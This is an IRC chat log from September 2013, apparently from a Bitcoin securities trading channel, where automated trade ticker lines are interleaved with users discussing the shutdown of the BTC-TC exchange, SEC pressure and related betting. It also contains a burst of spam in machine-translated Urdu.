0.0080175 = 9.621 BTC [-] {2} Sep 23 13:52:34 [BTCTC] [LABCOIN] 150 @ 0.001139 = 0.1709 BTC [-] Sep 23 13:53:35 [BTCTC] [LABCOIN] 2686 @ 0.00113741 = 3.0551 BTC [-] {2} Sep 23 13:53:35 [BTCTC] [ACTIVEMINING] 14669 @ 0.00125015 = 18.3385 BTC [-] {6} Sep 23 13:54:36 [BTCTC] [LABCOIN] 200 @ 0.0011375 = 0.2275 BTC [+] {2} Sep 23 13:55:37 [BTCTC] [TAT.NEOBEE] 90 @ 0.002701 = 0.2431 BTC [-] Sep 23 13:56:38 [BTCTC] [ACTIVEMINING] 4079 @ 0.00125012 = 5.0992 BTC [-] {4} Sep 23 13:56:38 [BTCTC] [LABCOIN] 1000 @ 0.0011787 = 1.1787 BTC [+] {3} Sep 23 13:57:39 [BTCTC] [LABCOIN] 1200 @ 0.00117983 = 1.4158 BTC [+] {2} Sep 23 13:58:40 [BTCTC] [LABCOIN] 3210 @ 0.00117725 = 3.779 BTC [-] {4} Sep 23 13:58:40 [BTCTC] [ACTIVEMINING] 300 @ 0.00125073 = 0.3752 BTC [+] {2} Sep 23 13:59:41 [BTCTC] [ACTIVEMINING] 130 @ 0.001253 = 0.1629 BTC [+] {2} Sep 23 13:59:42 [BTCTC] [LABCOIN] 2990 @ 0.00118 = 3.5282 BTC [+] Sep 23 14:00:42 [BTCTC] [ACTIVEMINING] 428 @ 0.0012503 = 0.5351 BTC [-] {2} Sep 23 14:01:43 [BTCTC] [LABCOIN] 795 @ 0.00113797 = 0.9047 BTC [-] {4} Sep 23 14:01:43 [BTCTC] [FN] [BTC-GROWTH] 100 @ 0.05285749 = 5.2857 BTC [+] {3} Sep 23 14:02:44 [BTCTC] [ASICMINER-PT] 2 @ 1.3835 = 2.767 BTC [+] {2} Sep 23 14:02:45 [MPEX] [S.MPOE] 10629 @ 0.00092796 = 9.8633 BTC [+] {2} Sep 23 14:03:45 [MPEX] [S.MPOE] 12721 @ 0.0009298 = 11.828 BTC [+] {2} Sep 23 14:04:47 [BTCTC] [LABCOIN] 3015 @ 0.00124659 = 3.7585 BTC [+] {7} Sep 23 14:04:47 [BTCTC] [TAT.ASICMINER] 603 @ 0.01343181 = 8.0994 BTC [+] {5} Sep 23 14:05:48 [BTCTC] [LABCOIN] 4260 @ 0.0011939 = 5.086 BTC [-] {3} Sep 23 14:05:48 [BTCTC] [ASICMINER-PT] 2 @ 1.389 = 2.778 BTC [+] Sep 23 14:05:48 [BTCTC] [TAT.ASICMINER] 40 @ 0.0124 = 0.496 BTC [-] Sep 23 14:06:49 [BTCTC] [ASICMINER-PT] 3 @ 1.38966666 = 4.169 BTC [+] {2} Sep 23 14:07:49 [BTCTC] [ASICMINER-PT] 9 @ 1.42344443 = 12.811 BTC [+] {5} Sep 23 14:07:49 [BTCTC] [TAT.ASICMINER] 109 @ 0.01237155 = 1.3485 BTC [-] {4} Sep 23 14:09:51 [BTCTC] [TAT.ASICMINER] 90 @ 0.01240943 = 1.1168 BTC [+] {6} Sep 23 14:09:51 [BTCTC] [FN] [BTC-GROWTH] 40 @ 0.073 = 2.92 BTC [+] Sep 23 14:09:52 [BTCTC] [ASICMINER-PT] 1 @ 1.465 BTC [+] Sep 23 14:10:52 [BTCTC] [ASICMINER-PT] 4 @ 1.39849999 = 5.594 BTC [-] {3} Sep 23 14:12:54 [BTCTC] [LABCOIN] 382 @ 0.00123487 = 0.4717 BTC [-] {2} Sep 23 14:13:55 [BTCTC] [LABCOIN] 14063 @ 0.00121444 = 17.0787 BTC [-] {6} Sep 23 14:13:55 [BTCTC] [TAT.ASICMINER] 28 @ 0.0143 = 0.4004 BTC [+] Sep 23 14:14:57 [BTCTC] [LABCOIN] 4967 @ 0.00124417 = 6.1798 BTC [+] {4} Sep 23 14:15:57 [BTCTC] [ASICMINER-PT] 2 @ 1.44 = 2.88 BTC [+] {2} Sep 23 14:15:58 [BTCTC] [LABCOIN] 831 @ 0.00117946 = 0.9801 BTC [-] {2} Sep 23 14:15:58 [HAVELOCK] [AM1] 2 @ 1.74999999 = 3.5 BTC [+] {2} Sep 23 14:16:58 [HAVELOCK] [AM1] 2 @ 1.74999999 = 3.5 BTC [+] {2} Sep 23 14:17:00 [BTCTC] [BASIC-MINING] 85 @ 0.06479798 = 5.5078 BTC [+] {8} Sep 23 14:17:00 [BTCTC] [ASICMINER-PT] 1 @ 1.4 BTC [-] Sep 23 14:17:00 [BTCTC] [LABCOIN] 387 @ 0.001247 = 0.4826 BTC [+] Sep 23 14:18:00 [BTCTC] [LABCOIN] 4610 @ 0.001248 = 5.7533 BTC [+] Sep 23 14:19:00 [BTCTC] [FN] [BTC-GROWTH] 49 @ 0.073 = 3.577 BTC [+] Sep 23 14:19:17 people are still betting on "there will be blood". that's cheating Sep 23 14:19:55 well, not really actually. things could change Sep 23 14:21:03 [BTCTC] [TAT.ASICMINER] 44 @ 0.01240954 = 0.546 BTC [-] {2} Sep 23 14:21:03 [BTCTC] [DMS.MINING] 2241 @ 0.00160047 = 3.5867 BTC [-] {2} Sep 23 14:22:12 yup, it's cheating! Sep 23 14:22:30 cut off the last 6 bets :p Sep 23 14:23:53 at least the "multiple exchanges" ipos make sense now Sep 23 14:24:17 hehe true Sep 23 14:24:33 I'm more upset of the loss of ltc-global… I'm going to be stuck with ltcs and they have lost a lot of value Sep 23 14:25:07 [BTCTC] [FN] [BTC-GROWTH] 50 @ 0.073 = 3.65 BTC [+] Sep 23 14:25:14 are you talking about the stock or exchange re "loss of ltc-global" Sep 23 14:25:18 ? Sep 23 14:25:28 yes, the ltc stocks :) Sep 23 14:25:31 Deprived is buying back his stuff Sep 23 14:25:47 yup Sep 23 14:26:09 let's hope he creates a BTC-ATF :) Sep 23 14:26:31 http://bitbet.us/bet/495/there-will-be-blood/ pew Sep 23 14:26:37 BitBet - There will be blood Sep 23 14:27:09 [MPEX] [S.MPOE] 9722 @ 0.00092973 = 9.0388 BTC [-] Sep 23 14:28:06 imagine btctctt delays its closure a bit… that would be fun Sep 23 14:28:15 it's planned 2 weeks before the stated date Sep 23 14:28:23 "or if its current owner announces its closure" Sep 23 14:28:29 oh :/ Sep 23 14:28:47 or its transfer to anonymous parties Sep 23 14:28:51 well thought! Sep 23 14:29:11 [BTCTC] [LABCOIN] 8302 @ 0.00126213 = 10.4782 BTC [+] {3} Sep 23 14:29:11 [BTCTC] [FN] [BTC-GROWTH] 4 @ 0.0731 = 0.2924 BTC [+] Sep 23 14:29:59 I wonder what the labcoin guys will do. so tempting to just walk away Sep 23 14:30:47 i agree, this will be exciting Sep 23 14:32:06 hm. I wish the site would just appear somewhere else, like the pirate bay. Sep 23 14:32:14 [BTCTC] [ASICMINER-PT] 1 @ 1.36 BTC [-] Sep 23 14:33:57 the MPEX model is quite close to the new pirate bay model Sep 23 14:34:07 the core doesn't do much Sep 23 14:34:15 [MPEX] [S.BBET] 15000 @ 0.00055333 = 8.3 BTC [-] {2} Sep 23 14:34:21 torrents are hosted elsewhere, trackers too Sep 23 14:34:34 and there are proxys Sep 23 14:35:37 the core doesn't do much? Sep 23 14:35:40 you serious? Sep 23 14:36:05 Any news? Sep 23 14:36:17 [MPEX] [S.MPOE] 10000 @ 0.00092738 = 9.2738 BTC [-] {3} Sep 23 14:36:25 ThickerThanThiev, already online? Sep 23 14:37:18 [BTCTC] [LABCOIN] 6236 @ 0.00124861 = 7.7863 BTC [-] {6} Sep 23 14:37:18 [BTCTC] [FN] [BTC-GROWTH] 73 @ 0.073 = 5.329 BTC [-] Sep 23 14:38:19 [BTCTC] [FN] [BTC-GROWTH] 20 @ 0.073 = 1.46 BTC [-] Sep 23 14:38:19 [BTCTC] [LABCOIN] 1000 @ 0.00122 = 1.22 BTC [-] Sep 23 14:38:19 [BTCTC] [TAT.ASICMINER] 42 @ 0.01242 = 0.5216 BTC [+] {2} Sep 23 14:38:28 yeha i'm here Sep 23 14:38:31 busy but here Sep 23 14:38:44 how's your day so far? Sep 23 14:39:20 [BTCTC] [LABCOIN] 336 @ 0.001211 = 0.4069 BTC [-] Sep 23 14:40:21 [BTCTC] [ACTIVEMINING] 1470 @ 0.00134617 = 1.9789 BTC [+] {3} Sep 23 14:40:21 [BTCTC] [LABCOIN] 3334 @ 0.00121017 = 4.0347 BTC [-] {3} Sep 23 14:40:21 [HAVELOCK] [AM100] 53 @ 0.01585433 = 0.8403 BTC [-] {6} Sep 23 14:41:22 [BTCTC] [ACTIVEMINING] 858 @ 0.00135766 = 1.1649 BTC [+] {2} Sep 23 14:41:34 i had prepared for a long day today Sep 23 14:41:43 just didnt realize itd be this long Sep 23 14:41:47 twss Sep 23 14:42:17 We had already been discussing a plan for BTCT closure since it was obviously imminent Sep 23 14:42:23 [BTCTC] [LABCOIN] 200 @ 0.00121 = 0.242 BTC [-] Sep 23 14:42:23 [BTCTC] [ACTIVEMINING] 765 @ 0.00139371 = 1.0662 BTC [+] {4} Sep 23 14:43:03 The fact that a plan exists is promising Sep 23 14:43:24 [BTCTC] [ACTIVEMINING] 1304 @ 0.00129458 = 1.6881 BTC [-] {3} Sep 23 14:43:24 [BTCTC] [CRYPTO-TRADE] 1 @ 0.12 BTC [-] Sep 23 14:44:25 [BTCTC] [CRYPTO-TRADE] 1 @ 0.12 BTC [-] Sep 23 14:45:26 [BTCTC] [ASICMINER-PT] 3 @ 1.45 = 4.35 BTC [+] {2} Sep 23 14:45:27 [HAVELOCK] [AM1] 1 @ 1.62200001 BTC [-] Sep 23 14:46:28 [HAVELOCK] [AM1] 1 @ 1.622 BTC [-] Sep 23 14:47:28 [BTCTC] [ASICMINER-PT] 27 @ 1.4828148 = 40.036 BTC [+] {11} Sep 23 14:47:29 [HAVELOCK] [AM1] 2 @ 1.56300001 = 3.126 BTC [-] Sep 23 14:48:31 [BTCTC] [ASICMINER-PT] 2 @ 1.499 = 2.998 BTC [+] {2} Sep 23 14:50:32 [BTCTC] [DMS.MINING] 190 @ 0.001604 = 0.3048 BTC [+] Sep 23 14:50:32 [BTCTC] [LABCOIN] 392 @ 0.001237 = 0.4849 BTC [+] Sep 23 14:51:33 [BTCTC] [LABCOIN] 4615 @ 0.00124836 = 5.7612 BTC [+] {5} Sep 23 14:51:33 [BTCTC] [FN] [BTC-GROWTH] 108 @ 0.09094259 = 9.8218 BTC [+] {3} Sep 23 14:51:33 [BTCTC] [TAT.ASICMINER] 478 @ 0.01243218 = 5.9426 BTC [+] {5} Sep 23 14:51:33 [BTCTC] [BASIC-MINING] 10 @ 0.06931 = 0.6931 BTC [-] {2} Sep 23 14:52:27 ThickAsThieves, Good to hear you have it under control. Sep 23 14:52:34 [BTCTC] [TAT.ASICMINER] 116 @ 0.01429085 = 1.6577 BTC [+] {4} Sep 23 14:52:34 [BTCTC] [ACTIVEMINING] 2114 @ 0.00148779 = 3.1452 BTC [+] {6} Sep 23 14:52:34 [BTCTC] [DMS.MINING] 1121 @ 0.00153357 = 1.7191 BTC [-] {4} Sep 23 14:52:34 [BTCTC] [ASICMINER-PT] 5 @ 1.401 = 7.005 BTC [-] {3} Sep 23 14:53:35 [BTCTC] [LABCOIN] 14048 @ 0.00116064 = 16.3047 BTC [-] {15} Sep 23 14:54:11 BTCT is closing ? Sep 23 14:54:23 yes Sep 23 14:54:30 I dont get why this is big news Sep 23 14:54:36 [BTCTC] [LABCOIN] 3617 @ 0.00121995 = 4.4126 BTC [+] {5} Sep 23 14:54:50 DiabloD3: You don't think its important to know? Sep 23 14:55:03 whats happening with bitfunder? Sep 23 14:55:06 I mean, I dont get why anyone is surprised Sep 23 14:55:12 VanCleef: well, its about to get a fuckton of new assets Sep 23 14:55:30 oh, so its safe for now? Sep 23 14:55:37 [BTCTC] [LABCOIN] 2438 @ 0.00125201 = 3.0524 BTC [+] {4} Sep 23 14:55:48 yeah, for now Sep 23 14:56:10 do you think it will face the same fate as btct? Sep 23 14:56:16 maybe in a few months Sep 23 14:56:20 fuck Sep 23 14:56:28 hey, I warned everyone Sep 23 14:56:31 thank you SEC for protecting us Sep 23 14:56:35 im gonna move to murica Sep 23 14:56:39 yeah true Sep 23 14:56:42 the SEC is going to attack all the victims of GLBSE Sep 23 14:56:50 scrat brings more guns with you, they dont have enough Sep 23 14:56:52 are they all based out of the US? Sep 23 14:56:58 how the fk is sec shuting them down Sep 23 14:57:01 is bitfunder based in usa? Sep 23 14:57:01 well how knows. burnside "couldn't comment on bf's situation" Sep 23 14:58:40 [BTCTC] [TAT.ASICMINER] 14 @ 0.01432357 = 0.2005 BTC [+] {2} Sep 23 14:59:01 Its nice waking up in the morning to being fucked by burnside Sep 23 14:59:41 [BTCTC] [TAT.ASICMINER] 193 @ 0.01491698 = 2.879 BTC [+] {7} Sep 23 14:59:41 [BTCTC] [LABCOIN] 2000 @ 0.00124831 = 2.4966 BTC [+] {2} Sep 23 15:00:15 Ogedei_: all of them are US Sep 23 15:00:20 except for GLBSE Sep 23 15:00:26 which the british SEC shut down Sep 23 15:00:42 [BTCTC] [LABCOIN] 2893 @ 0.00124969 = 3.6154 BTC [+] {2} Sep 23 15:00:42 [BTCTC] [TAT.ASICMINER] 13 @ 0.0148323 = 0.1928 BTC [-] {2} Sep 23 15:00:43 [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Sep 23 15:01:43 [BTCTC] [TAT.ASICMINER] 8 @ 0.0143325 = 0.1147 BTC [-] {2} Sep 23 15:02:44 [BTCTC] [DMS.MINING] 1534 @ 0.00150071 = 2.3021 BTC [-] {5} Sep 23 15:02:44 [BTCTC] [ASICMINER-PT] 4 @ 1.40199999 = 5.608 BTC [+] {4} Sep 23 15:03:45 [BTCTC] [ASICMINER-PT] 2 @ 1.4045 = 2.809 BTC [+] {2} Sep 23 15:03:45 [BTCTC] [ACTIVEMINING] 618 @ 0.00158051 = 0.9768 BTC [+] {6} Sep 23 15:03:46 [BTCTC] [LABCOIN] 320 @ 0.001198 = 0.3834 BTC [-] Sep 23 15:03:53 is bitfunder going to to have the same faith as btc-tc? Sep 23 15:04:28 what, run until its shut down? Sep 23 15:04:31 probably Sep 23 15:04:34 its all anyone can do Sep 23 15:04:45 [BTCTC] [FN] [DMS.SELLING] 350 @ 0.00632 = 2.212 BTC [+] {2} Sep 23 15:04:45 [BTCTC] [TAT.ASICMINER] 43 @ 0.0143 = 0.6149 BTC [-] Sep 23 15:04:45 [BTCTC] [ASICMINER-PT] 5 @ 1.404 = 7.02 BTC [-] {2} Sep 23 15:04:47 [BTCTC] [LABCOIN] 39667 @ 0.00115149 = 45.6762 BTC [-] {24} Sep 23 15:04:48 [HAVELOCK] [AM1] 2 @ 1.56300001 = 3.126 BTC [-] Sep 23 15:05:46 [BTCTC] [LABCOIN] 815 @ 0.001197 = 0.9756 BTC [+] {3} Sep 23 15:05:46 [HAVELOCK] [AM1] 2 @ 1.5346 = 3.0692 BTC [-] {2} Sep 23 15:05:47 [BTCTC] [ACTIVEMINING] 977 @ 0.00132946 = 1.2989 BTC [-] {2} Sep 23 15:05:48 [BTCTC] [FN] [DMS.SELLING] 99 @ 0.00602 = 0.596 BTC [-] Sep 23 15:06:48 [BTCTC] [ACTIVEMINING] 8255 @ 0.00131524 = 10.8573 BTC [-] {3} Sep 23 15:06:49 [BTCTC] [LABCOIN] 6558 @ 0.00114428 = 7.5042 BTC [-] {4} Sep 23 15:06:49 [BTCTC] [BTC-TRADING-PT] 12 @ 0.1 = 1.2 BTC [+] Sep 23 15:06:51 [BTCTC] [ASICMINER-PT] 1 @ 1.382 BTC [-] Sep 23 15:06:52 [BTCTC] [TAT.ASICMINER] 44 @ 0.01433772 = 0.6309 BTC [+] {2} Sep 23 15:07:48 [BTCTC] [ACTIVEMINING] 27049 @ 0.0012942 = 35.0068 BTC [-] {4} Sep 23 15:07:48 [BTCTC] [DMS.MINING] 600 @ 0.0015025 = 0.9015 BTC [+] {2} Sep 23 15:07:50 [HAVELOCK] [AM1] 19 @ 1.5061 = 28.6159 BTC [-] Sep 23 15:08:49 [BTCTC] [ACTIVEMINING] 101 @ 0.00158613 = 0.1602 BTC [+] {2} Sep 23 15:08:50 [BTCTC] [ASICMINER-PT] 57 @ 1.37456139 = 78.35 BTC [-] {8} Sep 23 15:08:50 [BTCTC] [TAT.ASICMINER] 24 @ 0.01434 = 0.3442 BTC [+] Sep 23 15:08:51 [BTCTC] [LABCOIN] 1720 @ 0.001137 = 1.9556 BTC [-] {3} Sep 23 15:09:19 Blergh Sep 23 15:09:29 you need a weexchange account for bitfunder Sep 23 15:09:30 derp Sep 23 15:09:42 too bad I'm forced to use that exchange now... Sep 23 15:09:51 [BTCTC] [LABCOIN] 1720 @ 0.001137 = 1.9556 BTC [-] Sep 23 15:09:54 I wonder what BTC-MINING is going to do about this Sep 23 15:10:51 [BTCTC] [ASICMINER-PT] 11 @ 1.39554545 = 15.351 BTC [+] {3} Sep 23 15:10:52 [BTCTC] [LABCOIN] 3441 @ 0.00113803 = 3.916 BTC [+] {3} Sep 23 15:10:52 [BTCTC] [ACTIVEMINING] 1100 @ 0.00158698 = 1.7457 BTC [+] {2} Sep 23 15:11:54 [BTCTC] [ASICMINER-PT] 1 @ 1.352 BTC [-] Sep 23 15:12:54 [BTCTC] [TAT.ASICMINER] 185 @ 0.01430783 = 2.6469 BTC [-] {4} Sep 23 15:12:54 [BTCTC] [ASICMINER-PT] 17 @ 1.30617646 = 22.205 BTC [-] {7} Sep 23 15:13:55 [BTCTC] [ASICMINER-PT] 26 @ 1.29911538 = 33.777 BTC [-] {2} Sep 23 15:13:55 [BTCTC] [TAT.ASICMINER] 355 @ 0.0141985 = 5.0405 BTC [-] {3} Sep 23 15:14:56 [BTCTC] [ASICMINER-PT] 3 @ 1.276 = 3.828 BTC [-] Sep 23 15:15:57 [BTCTC] [ASICMINER-PT] 3 @ 1.3 = 3.9 BTC [+] Sep 23 15:15:57 [BTCTC] [TAT.ASICMINER] 134 @ 0.01271528 = 1.7038 BTC [+] {5} Sep 23 15:16:41 V'Las: کیوں آپ کو ایک Shuttlepod شروع کیا؟ Sep 23 15:16:41 Tucker: کیوں تم اس پر برطرف کر دیا؟ Sep 23 15:16:41 حملے اور Maywether Mannöver پرواز کرنے کی حوصلہ افزائی کی گئی ہے جس کے تحت Shuttlepod میں Lt.Reed: Sep 23 15:16:41 Lt.Reed: میں نے آج ناشتا چھوڑ دینا چاہئے Sep 23 15:16:41 "Borderland" Sep 23 15:16:42 Dr.Soong جوناتھن آرچر ... وہ یہاں کیا اس کی طرف جاتا ہے؟ تم ان کے لیے جیل کا نام تبدیل کرنا چاہتے ہیں؟ Sep 23 15:16:44 "موت اسٹیشن" Sep 23 15:16:46 کمانڈر Tucker اور آرچر سرخ ذکر نقصان بھی شامل ہے انٹرپرائز holographically کم نمائندگی ہے جہاں Reperationsstation کی کمان مرکز درج ​​کریں: Sep 23 15:16:48 کمانڈر Tucker: میں واقعی میں ہر چھوٹی تفصیل کو گرفتار کر لیا اور یہاں درج ہے کہ یقین نہیں ہوتا. دیکھو، مجھے بالکل بیرونی شیل کے ساتھ فیری کی جگہ کے معائنے پر 1 سال پہلے کر دیا ہے. Sep 23 15:16:48 DiabloD3 I'm here Sep 23 15:16:50 آرچر: میں تم سے اس پر پینٹ کر سکتے ہیں نہیں بتایا تھا؟ Sep 23 15:16:53 Tucker: میں نے پہلے تھا جلد ہی .... Sep 23 15:16:55 "اگردوت" Sep 23 15:16:57 Tucker اس کے کوارٹر فائنل میں T'Pol کے ساتھ بیٹھتا ہے اور Sep 23 15:16:58 [BTCTC] [TAT.ASICMINER] 136 @ 0.01417544 = 1.9279 BTC [+] {3} Sep 23 15:16:58 [BTCTC] [LABCOIN] 1100 @ 0.0011799 = 1.2979 BTC [+] {2} Sep 23 15:16:58 MobPhone: hi. Sep 23 15:17:07 anyone else notice that burnside renamed the thread to 'Virtual Community Exchange' ? :P Sep 23 15:17:19 burnside is such a fucking scammer Sep 23 15:17:21 hes just like nefario Sep 23 15:17:32 DiabloD3 how do I transfer Sep 23 15:17:37 transfer what? Sep 23 15:17:41 the world Sep 23 15:17:46 Asic Sep 23 15:17:49 Share Sep 23 15:17:52 talk to your PT owner Sep 23 15:17:59 [HAVELOCK] [LABCO] 194 @ 0.00304998 = 0.5917 BTC [-] Sep 23 15:18:00 [BTCTC] [ASICMINER-PT] 61 @ 1.27691799 = 77.892 BTC [-] {16} Sep 23 15:18:00 [BTCTC] [LABCOIN] 5000 @ 0.00127305 = 6.3653 BTC [+] {10} Sep 23 15:18:39 Wtf going crazy Sep 23 15:18:41 Brb Sep 23 15:18:48 who is the best bitcoin troll Sep 23 15:18:55 DiabloD3 or Troll-Jr Sep 23 15:18:57 vote now Sep 23 15:18:59 Scrat: hey now Sep 23 15:19:01 what about nefario Sep 23 15:19:05 or the guy that owned bitcoinica Sep 23 15:19:16 they trolled everyone everywhere forever Sep 23 15:19:26 they were douchebags, not trolls Sep 23 15:19:27 netsplit? Sep 23 15:19:39 and we get to add burnside to the list too Sep 23 15:19:46 and the bfl guys Sep 23 15:19:49 they trolled too Sep 23 15:20:01 [HAVELOCK] [LABCO] 560 @ 0.00222375 = 1.2453 BTC [-] {3} Sep 23 15:20:02 [BTCTC] [ASICMINER-PT] 1 @ 1.276 BTC [-] Sep 23 15:20:45 anyone know how to deal with btc-bond shares? should I try to transfer or redeem them at this point? Sep 23 15:21:02 [HAVELOCK] [LABCO] 50 @ 0.00222 = 0.111 BTC [-] Sep 23 15:21:33 anyhow, I hope I can significantly buy back DMC before BF goes next Sep 23 15:21:51 at least we're past the 75% mark Sep 23 15:22:03 [BTCTC] [ASICMINER-PT] 4 @ 1.2725 = 5.09 BTC [-] {2} Sep 23 15:22:03 [BTCTC] [LABCOIN] 4973 @ 0.001249 = 6.2113 BTC [+] {2} Sep 23 15:22:03 [BTCTC] [DMS.MINING] 91 @ 0.001404 = 0.1278 BTC [-] Sep 23 15:22:53 DAFUQ happend here Sep 23 15:22:53 http://bitbet.us/bet/495/there-will-be-blood/ Sep 23 15:22:58 BitBet - There will be blood Sep 23 15:23:04 [BTCTC] [LABCOIN] 4083 @ 0.00131141 = 5.3545 BTC [+] {6} Sep 23 15:23:04 [BTCTC] [ASICMINER-PT] 2 @ 1.2715 = 2.543 BTC [-] {2} Sep 23 15:23:04 [HAVELOCK] [AM100] 9 @ 0.01545 = 0.1391 BTC [-] Sep 23 15:23:05 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1999 BTC [+] Sep 23 15:23:58 oh shit kakobrekla Sep 23 15:24:03 just a few minutes ago it was even Sep 23 15:24:05 [HAVELOCK] [AM100] 15 @ 0.01506666 = 0.226 BTC [-] {2} Sep 23 15:24:06 [BTCTC] [BTC-BOND] 89 @ 0.0091 = 0.8099 BTC [+] Sep 23 15:24:06 [BTCTC] [FN] [DMS.SELLING] 1701 @ 0.00523859 = 8.9108 BTC [-] {6} Sep 23 15:24:06 [BTCTC] [TAT.ASICMINER] 30 @ 0.01285233 = 0.3856 BTC [-] {2} Sep 23 15:24:07 [BTCTC] [LABCOIN] 7500 @ 0.00132005 = 9.9004 BTC [+] {3} Sep 23 15:24:08 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1999 BTC [+] Sep 23 15:24:17 hyeah is why im asking wtf Sep 23 15:24:56 aa Sep 23 15:25:06 BTCTC is shutting down Sep 23 15:25:06 [BTCTC] [LABCOIN] 5164 @ 0.00133538 = 6.8959 BTC [+] {7} Sep 23 15:25:06 [HAVELOCK] [AM100] 82 @ 0.0150111 = 1.2309 BTC [-] Sep 23 15:25:07 lmao Sep 23 15:25:07 [BTCTC] [BASIC-MINING] 4 @ 0.067 = 0.268 BTC [+] Sep 23 15:25:07 [BTCTC] [BTC-BOND] 192 @ 0.001 = 0.192 BTC [-] Sep 23 15:25:40 "oh what a surprise!" Sep 23 15:26:01 :P Sep 23 15:26:07 shit happens Sep 23 15:26:07 [BTCTC] [LABCOIN] 7821 @ 0.001339 = 10.4723 BTC [+] {11} Sep 23 15:26:07 [BTCTC] [BTC-BOND] 219 @ 0.00099 = 0.2168 BTC [-] Sep 23 15:26:20 am i just screwed with these btc-bonds? Sep 23 15:26:49 soypirate: have to talk to namworld Sep 23 15:27:08 [BTCTC] [FN] [BTC-GROWTH] 103 @ 0.08 = 8.24 BTC [-] Sep 23 15:27:08 [BTCTC] [LABCOIN] 4536 @ 0.00136414 = 6.1877 BTC [+] {2} Sep 23 15:27:14 ok, thanks buddy... Sep 23 15:27:15 becase, as someone has tought me on the forum, business is fun ad not business, shit happens Sep 23 15:27:31 fuckin kezboard Sep 23 15:29:08 * You are banned from this server- Please do not spam users or channels on freenode. If in error, please contact kline@freenode.net. Thanks! (2013/9/23 12.03) Sep 23 15:29:08 [rajaniemi.freenode.net] *** Checking Ident Sep 23 15:29:08 [rajaniemi.freenode.net] *** Couldn't look up your hostname Sep 23 15:29:08 [rajaniemi.freenode.net] *** No Ident response Sep 23 15:29:16 V'Las: کیوں آپ کو ایک Shuttlepod شروع کیا؟ Sep 23 15:29:16 Tucker: کیوں تم اس پر برطرف کر دیا؟ Sep 23 15:29:16 حملے اور Maywether Mannöver پرواز کرنے کی حوصلہ افزائی کی گئی ہے جس کے تحت Shuttlepod میں Lt.Reed: Sep 23 15:29:16 Lt.Reed: میں نے آج ناشتا چھوڑ دینا چاہئے Sep 23 15:29:18 "Borderland" Sep 23 15:29:20 Dr.Soong جوناتھن آرچر ... وہ یہاں کیا اس کی طرف جاتا ہے؟ تم ان کے لیے جیل کا نام تبدیل کرنا چاہتے ہیں؟ Sep 23 15:29:22 "موت اسٹیشن" Sep 23 15:29:25 کمانڈر Tucker اور آرچر سرخ ذکر نقصان بھی شامل ہے انٹرپرائز holographically کم نمائندگی ہے جہاں Reperationsstation کی کمان مرکز درج ​​کریں: Sep 23 15:29:26 کمانڈر Tucker: میں واقعی میں ہر چھوٹی تفصیل کو گرفتار کر لیا اور یہاں درج ہے کہ یقین نہیں ہوتا. دیکھو، مجھے بالکل بیرونی شیل کے ساتھ فیری کی جگہ کے معائنے پر 1 سال پہلے کر دیا ہے. Sep 23 15:29:29 what the hell is up with that spam?. Sep 23 15:29:29 آرچر: میں تم سے اس پر پینٹ کر سکتے ہیں نہیں بتایا تھا؟ Sep 23 15:29:31 Tucker: میں نے پہلے تھا جلد ہی .... Sep 23 15:29:33 "اگردوت" Sep 23 15:29:35 Tucker اس کے کوارٹر فائنل میں T'Pol کے ساتھ بیٹھتا ہے اور Sep 23 15:30:07 kakobrekla: ouch Sep 23 15:30:22 sigh Sep 23 15:30:35 this isnt #bitcoin-terrorists Sep 23 15:30:53 that looks like a star trek script Sep 23 15:31:12 [BTCTC] [LABCOIN] 569 @ 0.001375 = 0.7824 BTC [+] {2} Sep 23 15:31:12 [HAVELOCK] [CBTC] 298 @ 0.00039965 = 0.1191 BTC [-] Sep 23 15:31:13 [MPEX] [S.MPOE] 3000 @ 0.00092851 = 2.7855 BTC [+] Sep 23 15:31:36 DiabloD3 back Sep 23 15:32:13 [HAVELOCK] [SMG] 1795 @ 0.0001751 = 0.3143 BTC [-] {2} Sep 23 15:32:14 [BTCTC] [LABCOIN] 10281 @ 0.00138552 = 14.2445 BTC [+] {9} Sep 23 15:32:15 [BTCTC] [ACTIVEMINING] 550 @ 0.00153711 = 0.8454 BTC [+] {4} Sep 23 15:32:15 [BTCTC] [NASTY-PT] 744 @ 0.0006012 = 0.4473 BTC [-] Sep 23 15:33:14 [HAVELOCK] [SMG] 17200 @ 0.00017444 = 3.0004 BTC [-] Sep 23 15:33:16 [BTCTC] [DMS.MINING] 2164 @ 0.00140034 = 3.0303 BTC [-] {4} Sep 23 15:33:16 [BTCTC] [LABCOIN] 28870 @ 0.00120876 = 34.8969 BTC [-] {24} Sep 23 15:34:14 [BTCTC] [LABCOIN] 108336 @ 0.00107917 = 116.913 BTC [-] {47} Sep 23 15:34:15 [BTCTC] [TAT.ASICMINER] 101 @ 0.01299316 = 1.3123 BTC [+] {3} Sep 23 15:34:15 [BTCTC] [ASICMINER-PT] 1 @ 1.291 BTC [+] Sep 23 15:35:15 [BTCTC] [ASICMINER-PT] 5 @ 1.32599999 = 6.63 BTC [+] {5} Sep 23 15:35:16 [BTCTC] [LABCOIN] 38631 @ 0.00102291 = 39.516 BTC [-] {4} Sep 23 15:35:17 BTCOxygen what's going on? You have been ignoring me. Is this how you treat all your investors? I've been very patient with you. I will be cutting my losses and be leaving negative ratings and scam warnings if you have not returned my original investment capital within 48 hours. I will not accept excuses. Sort your shit out! Sep 23 15:36:17 [BTCTC] [LABCOIN] 4077 @ 0.00110039 = 4.4863 BTC [+] {3} Sep 23 15:36:25 oh? Sep 23 15:36:29 whats this about anyway Sep 23 15:37:00 private investment Sep 23 15:37:18 [BTCTC] [LABCOIN] 1878 @ 0.00110353 = 2.0724 BTC [+] {5} Sep 23 15:37:18 [BTCTC] [CRYPTO-TRADE] 3 @ 0.185 = 0.555 BTC [-] Sep 23 15:37:19 hey kakobrekla long time - how's things? Sep 23 15:37:38 good! thanks, and you? Sep 23 15:38:19 [BTCTC] [FN] [DMS.SELLING] 1250 @ 0.005 = 6.25 BTC [-] {2} Sep 23 15:38:19 [BTCTC] [ACTIVEMINING] 537 @ 0.00149812 = 0.8045 BTC [-] {2} Sep 23 15:38:24 great! i got some really fantastic upcoming news for Australia hopefully tomorrow will have confirmation Sep 23 15:39:13 :) Sep 23 15:39:20 [BTCTC] [ASICMINER-PT] 1 @ 1.351 BTC [+] Sep 23 15:39:20 [BTCTC] [ACTIVEMINING] 208 @ 0.001501 = 0.3122 BTC [+] Sep 23 15:40:00 leotreasure: That sounds promising Sep 23 15:40:21 [BTCTC] 